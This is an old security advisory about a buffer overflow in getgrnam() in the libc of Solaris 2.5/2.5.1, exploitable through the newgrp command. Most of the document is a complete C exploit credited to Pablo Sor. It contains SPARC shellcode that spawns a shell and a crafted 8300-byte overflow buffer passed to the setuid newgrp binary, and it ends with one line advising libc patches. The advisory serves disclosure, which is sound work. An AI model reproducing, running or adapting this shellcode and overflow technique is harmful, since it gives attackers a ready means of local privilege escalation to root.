Vulnerability

    getgrnam() (libc)

Affected

    Solaris 2.5x

Description

    Pablo Sor posted  following.  Old  versions of Solaris,  2.5/2.5.1
    (without  patch)  contain  an   exploitable  buffer  overflow   in
    getgrnam()  libc  function.   This  vulnerability  may  be used in
    newgrp command.

        #include <stdio.h>
        #include <sys/types.h>
        
        
        /*
           getgrnam() function overflow.
        
           works against Solaris 2.5.1 (SPARC)
           default offset should work.
        
           Pablo Sor, Buenos Aires, Argentina.
           psor@afip.gov.ar
        
        */
        
        u_char shell[] =
         "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
         "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
         "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
         "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
         "\x82\x10\x20\x3b\x91\xd4\xff\xff";
        u_long get_sp(void)
        {
           __asm__("mov %sp,%i0 \n");
        }
        
        void main()
        {
        
         long *p;
         long addr;
         char buf[8300];
         int i;
        
        
         addr = get_sp()-8096;
         printf("Jumping to address %p\n",addr);
         p = (long *) buf;
         for (i=0;i<2050;++i) *(p++) = 0xa61cc013;
         for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];
         p = (long *) &buf[8160];
         for (i=0;i<30;++i) *(p++) = addr;
         buf[8280]=0;
         execl("/usr/bin/newgrp","newgrp",buf,(char *)0);
        
        }

Solution

    Apply latest patches for libc.